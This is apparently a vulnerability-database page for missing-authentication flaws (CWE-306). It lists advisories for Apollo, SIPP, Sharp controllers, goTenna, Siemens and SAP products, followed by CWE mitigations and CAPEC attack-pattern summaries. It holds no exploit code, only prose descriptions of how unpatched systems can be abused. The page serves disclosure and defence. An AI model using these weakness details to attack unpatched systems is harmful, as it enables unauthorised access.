If users expose the apollo-configservice to the internet(which is not recommended), there are potential security issues since there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice .

Patches

Login authentication for eureka was added in https://github.com/apolloconfig/apollo/pull/4663 and was released in v2.1.0.

Workarounds

To fix the potential issue without upgrading, simply follow the advice that does not expose apollo-configservice to the internet.

References

Apollo Security Guidence

For more information

If you have any questions or comments about this advisory: * Open an issue in issue * Email us at apollo-config@googlegroups.com

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.ctrip.framework.apollo:apollo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-25570"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-02-22T21:58:33Z",
    "nvd_published_at": "2023-02-20T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nIf users expose the apollo-configservice to the internet(which is not recommended), there are potential security issues since there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice .\n\n### Patches\nLogin authentication for eureka was added in https://github.com/apolloconfig/apollo/pull/4663 and was released in [v2.1.0](https://github.com/apolloconfig/apollo/releases/tag/v2.1.0).\n\n### Workarounds\nTo fix the potential issue without upgrading, simply follow the advice that does not expose apollo-configservice to the internet.\n\n### References\n[Apollo Security Guidence](https://www.apolloconfig.com/#/en/portal/apollo-user-guide?id=_71-security-related)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [issue](https://github.com/apolloconfig/apollo/issues)\n* Email us at [apollo-config@googlegroups.com](mailto:apollo-config@googlegroups.com)",
  "id": "GHSA-368x-wmmg-hq5c",
  "modified": "2026-06-08T23:55:14Z",
  "published": "2023-02-22T21:58:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apolloconfig/apollo/security/advisories/GHSA-368x-wmmg-hq5c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25570"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apolloconfig/apollo/pull/4663"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apolloconfig/apollo/commit/7df79bf8df6960433ed4ff782a54e3dfc74632bd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apolloconfig/apollo"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apolloconfig/apollo/releases/tag/v2.1.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apollo has potential access control security issue in eureka"
}

GHSA-36CW-X2XF-XMG3

Vulnerability from github – Published: 2026-03-28 12:30 – Updated: 2026-03-28 12:30
VLAI
Details

SIPP 3.3 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious input in the configuration file. Attackers can craft a configuration file with oversized values that overflow a stack buffer, overwriting the return address and executing arbitrary code through return-oriented programming gadgets.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-25225"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-28T12:16:03Z",
    "severity": "HIGH"
  },
  "details": "SIPP 3.3 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious input in the configuration file. Attackers can craft a configuration file with oversized values that overflow a stack buffer, overwriting the return address and executing arbitrary code through return-oriented programming gadgets.",
  "id": "GHSA-36cw-x2xf-xmg3",
  "modified": "2026-03-28T12:30:30Z",
  "published": "2026-03-28T12:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25225"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45288"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/sipp-stack-based-buffer-overflow-via-configuration-file"
    },
    {
      "type": "WEB",
      "url": "http://sipp.sourceforge.net"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-36RG-C62M-GWMX

Vulnerability from github – Published: 2024-10-17 15:31 – Updated: 2024-10-17 15:31
VLAI
Details

Improper authentication vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to access the affected product without authentication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-23783"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-14T10:15:08Z",
    "severity": "HIGH"
  },
  "details": "Improper authentication vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to access the affected product without authentication.",
  "id": "GHSA-36rg-c62m-gwmx",
  "modified": "2024-10-17T15:31:07Z",
  "published": "2024-10-17T15:31:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23783"
    },
    {
      "type": "WEB",
      "url": "https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf"
    },
    {
      "type": "WEB",
      "url": "https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/vu/JVNVU94591337"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-36XJ-GX8G-M5FR

Vulnerability from github – Published: 2024-09-26 18:31 – Updated: 2024-10-04 18:31
VLAI
Details

The goTenna Pro series allows unauthenticated attackers to remotely update the local public keys used for P2P and Group messages.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47130"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-26T18:15:10Z",
    "severity": "HIGH"
  },
  "details": "The goTenna Pro series allows unauthenticated attackers to remotely update the local public keys used for P2P and Group messages.",
  "id": "GHSA-36xj-gx8g-m5fr",
  "modified": "2024-10-04T18:31:09Z",
  "published": "2024-09-26T18:31:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47130"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-270-04"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-372Q-JMW9-5MW6

Vulnerability from github – Published: 2022-05-24 17:03 – Updated: 2024-01-09 12:30
VLAI
Details

A vulnerability has been identified in SiNVR 3 Central Control Server (CCS) (all versions), SiNVR 3 Video Server (all versions). The HTTP service (default port 5401/tcp) of the SiNVR 3 Video Server contains an authentication bypass vulnerability, even when properly configured with enforced authentication. A remote attacker with network access to the Video Server could exploit this vulnerability to read the SiNVR users database, including the passwords of all users in obfuscated cleartext.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-18339"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-12-12T19:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability has been identified in SiNVR 3 Central Control Server (CCS) (all versions), SiNVR 3 Video Server (all versions). The HTTP service (default port 5401/tcp) of the SiNVR 3 Video Server contains an authentication bypass vulnerability, even when properly configured with enforced authentication. A remote attacker with network access to the Video Server could exploit this vulnerability to read the SiNVR users database, including the passwords of all users in obfuscated cleartext.",
  "id": "GHSA-372q-jmw9-5mw6",
  "modified": "2024-01-09T12:30:34Z",
  "published": "2022-05-24T17:03:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18339"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-761617.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-378P-2R6R-M338

Vulnerability from github – Published: 2025-06-11 09:30 – Updated: 2025-06-12 06:30
VLAI
Details

A vulnerability has been identified in Perfect Harmony GH180 (All versions >= V8.0 < V8.3.3 with NXGPro+ controller manufactured between April 2020 to April 2025). The maintenance connection of affected devices fails to protect access to the device's control unit configuration. This could allow an attacker with physical access to the maintenance connection's door port to perform arbitrary configuration changes.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-35295"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-11T07:15:24Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in Perfect Harmony GH180 (All versions \u003e= V8.0 \u003c V8.3.3 with NXGPro+ controller manufactured between April 2020 to April 2025). The maintenance connection of affected devices fails to protect access to the device\u0027s control unit configuration. This could allow an attacker with physical access to the maintenance connection\u0027s door port to perform arbitrary configuration changes.",
  "id": "GHSA-378p-2r6r-m338",
  "modified": "2025-06-12T06:30:27Z",
  "published": "2025-06-11T09:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35295"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-771113.html"
    },
    {
      "type": "WEB",
      "url": "https://www.innomotics.com/hub/en/ISA-771113"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-37C2-5CHG-WWJ7

Vulnerability from github – Published: 2023-07-11 03:30 – Updated: 2024-04-04 05:54
VLAI
Details

SAP NetWeaver Application Server ABAP and ABAP Platform - version KRNL64NUC, 7.22, KRNL64NUC 7.22EXT, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KERNEL 7.22, KERNEL, 7.53, KERNEL 7.77, KERNEL 7.81, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.92, KERNEL 7.93, under some conditions, performs improper authentication checks for functionalities that require user identity. An attacker can perform malicious actions over the network, extending the scope of impact, causing a limited impact on confidentiality, integrity and availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-35874"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-11T03:15:10Z",
    "severity": "HIGH"
  },
  "details": "SAP NetWeaver Application Server ABAP and ABAP Platform - version KRNL64NUC, 7.22, KRNL64NUC 7.22EXT, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KERNEL 7.22, KERNEL, 7.53, KERNEL 7.77, KERNEL 7.81, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.92, KERNEL 7.93, under some conditions, performs improper authentication checks for functionalities that require user identity. An attacker can perform malicious actions over the network, extending the scope of impact, causing a limited impact on confidentiality, integrity and availability.\n\n",
  "id": "GHSA-37c2-5chg-wwj7",
  "modified": "2024-04-04T05:54:41Z",
  "published": "2023-07-11T03:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35874"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3318850"
    },
    {
      "type": "WEB",
      "url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.
  • Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected, including those channels that are assumed to be accessible only by authorized parties. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.
  • In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout.
Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation
Architecture and Design
  • Where possible, avoid implementing custom, "grow-your-own" authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These capabilities may avoid common weaknesses that are unique to authentication; support automatic auditing and tracking; and make it easier to provide a clear separation between authentication tasks and authorization tasks.
  • In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly.
Mitigation MIT-4.5
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45].
Mitigation
Implementation System Configuration Operation

When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to require strong authentication for users who should be allowed to access the data [REF-1297] [REF-1298] [REF-1302].

CAPEC-12: Choosing Message Identifier

This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.

CAPEC-166: Force the System to Reset Values

An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.

CAPEC-216: Communication Channel Manipulation

An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.

CAPEC-36: Using Unpublished Interfaces or Functionality

An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.

CAPEC-62: Cross Site Request Forgery

An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.